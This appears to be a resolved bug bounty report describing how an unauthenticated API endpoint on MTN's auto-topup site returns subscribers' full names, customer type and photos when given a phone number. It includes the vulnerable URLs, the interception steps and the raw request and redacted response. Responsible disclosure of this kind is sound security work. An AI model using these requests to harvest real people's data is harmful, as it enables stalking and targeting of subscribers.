Loading HuntDB...

Information Disclosure Leads To User Data Leak

M
MTN Group
Submitted None
Reported by netboy

Vulnerability Details

Technical details and impact analysis

Information Disclosure
Information disclosure is when a web application fails to properly protect confidential information, which causes revealing sensitive information or data of the users or anything related to users to any third party. ## Summary: Am able to get any MTN users data such as FULL NAME, CUSTOMER TYPE AND PICTURE. I can get those data by using only phone number of any MTN users. VUL URL: https://mtnautotopup.mtnonline.com/autotopup/app/sign-up-phone VUL URL: https://197.210.3.135/autotopup/app/sign-up-phone ~NOTE: Tested with a Nigeria phone number that belong to me. ## Steps To Reproduce: 1. Visit `https://mtnautotopup.mtnonline.com/autotopup/app/sign-up-phone` or `https://197.210.3.135/autotopup/app/sign-up-phone` 2. Put in a phone number and catch the request via BURP 3. INTERCEPT the request of `GET /vtu-service/api/pwa/pub/get-bio-data/081*******` 4. The response contains Fullname, Customer Type and Picture of the user. ## Supporting Material/References: VUL REQUEST: ``` GET /vtu-service/api/pwa/pub/get-bio-data/070******** HTTP/1.1 Host: mtnautotopupservices.mtnonline.com Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99" Accept: application/json, text/plain, */* Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://mtnautotopup.mtnonline.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://mtnautotopup.mtnonline.com/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ``` RESPONSE: ``` HTTP/1.1 200 OK Date: Thu, 14 Apr 2022 20:11:05 GMT Server: WildFly/10 X-Frame-Options: https://mtnautotopup.mtnonline.com, https://mtnautotopupservices.mtnonline.com, https://billable.mtnonline.com, https://mtnautotopup.mtnonline.com, https://mtnautotopupservices.mtnonline.com, https://billable.mtnonline.com Access-Control-Allow-Credentials: “true”, “true” Access-Control-Expose-Headers: origin, content-type, accept, Authorization,Access-Control-Allow-Origin, origin, content-type, accept, Authorization,Access-Control-Allow-Origin Access-Control-Allow-Headers: Access-Control-Allow-Headers, Origin,Accept, X-Requested-With, Content-Type, Access-Control-Request-Method,Access-Control-Request-Headers, Authorization, Access-Control-Allow-Methods, Access-Control-Allow-Headers, Origin,Accept, X-Requested-With, Content-Type, Access-Control-Request-Method,Access-Control-Request-Headers, Authorization, Access-Control-Allow-Methods X-XSS-Protection: 1; mode=block Referrer-Policy: origin-when-cross-origin Access-Control-Allow-Origin: * X-Powered-By: Undertow/1 Content-Type: application/json Cache-Control: max-age=0, public, no-cache, private, no-store Expires: Sat, 16 Apr 2022 20:11:05 GMT Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS X-Content-Type-Options: nosniff X-Content-Security-Policy: default-src 'self' *.mtnonline.com Strict-Transport-Security: max-age=631138519; includeSubDomains Feature-Policy: vibrate *; usermedia *; sync-xhr * Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS X-Content-Security-Policy: default-src 'self' *.mtnonline.com Feature-Policy: vibrate *; usermedia *; sync-xhr * Connection: close Content-Length: 295017 {"responseCode":"00","responseDescription":"Successful","firstname":"EXPOSE","lastname":"EXPOSE","othername":"EXPOSE","customerType":"Prepaid","profileImg":"EXPOSE"} ``` NOTE: I replaced the exposed data with EXPOSE. ## Impact An attacker can retrieve any users data (like full name, Customer Type, and Picture) by just using the victim phone number. This can be use for information gathering about someone for malicious use or criminal activity.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Information Disclosure